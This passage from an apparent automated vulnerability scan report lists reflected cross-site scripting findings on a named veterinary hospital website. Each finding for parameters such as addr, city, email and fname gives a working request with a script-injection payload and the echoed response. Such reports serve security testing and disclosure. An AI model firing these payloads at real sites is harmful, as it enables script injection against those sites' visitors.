This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=998d7"><script>alert(1)</script>24a59a02e19&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:51:59 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o6021kabr6ia1bncmhj0ivp1j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="addr" id="addr" type="text" size="50" class="req" maxlength="255" value="998d7"><script>alert(1)</script>24a59a02e19" />
...[SNIP]...

2.9. http://www.vcahospitals.com/hanson/offer.html [captcha_code parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the captcha_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 913cb"><script>alert(1)</script>e854b346b04 was submitted in the captcha_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:03 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=8oag095b9alesr04oe0qrcema0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=913cb"><script>alert(1)</script>e854b346b04&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcah
...[SNIP]...

2.10. http://www.vcahospitals.com/hanson/offer.html [city parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bbf"><script>alert(1)</script>a5aae805f3c was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=75bbf"><script>alert(1)</script>a5aae805f3c&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=odcmj1resusthd8a2o5c117463; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="city" id="city" type="text" size="40" class="req" maxlength="255" value="75bbf"><script>alert(1)</script>a5aae805f3c" />
...[SNIP]...

2.11. http://www.vcahospitals.com/hanson/offer.html [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a242"><script>alert(1)</script>c14d1d110d8 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=8a242"><script>alert(1)</script>c14d1d110d8&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=p2odhpks37cmhn3tkfcpdu3fp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="email" id="email" type="text" size="40" maxlength="255" value="8a242"><script>alert(1)</script>c14d1d110d8" />
...[SNIP]...

2.12. http://www.vcahospitals.com/hanson/offer.html [fname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the fname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f51a8"><script>alert(1)</script>4d0141775d0 was submitted in the fname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=f51a8"><script>alert(1)</script>4d0141775d0&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:16 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=4b778k6m2ab1pu0m5ssdhgvgn4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="fname" id="fname" type="text" size="30" class="req" maxlength="50" value="f51a8"><script>alert(1)</script>4d0141775d0" />
...[SNIP]...

2.13. http://www.vcahospitals.com/hanson/offer.html [formtype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

The value of the formtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d61d6"><script>alert(1)</script>e3343c73882 was submitted in the formtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%
2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:20 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=jvjkp2a3ouqtrsla9j7rqfi8m5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITALd61d6"><script>alert(1)</script>e3343c73882&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3fa
...[SNIP]...

2.14. http://www.vcahospitals.com/hanson/offer.html [guid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/offer.html

Issue detail

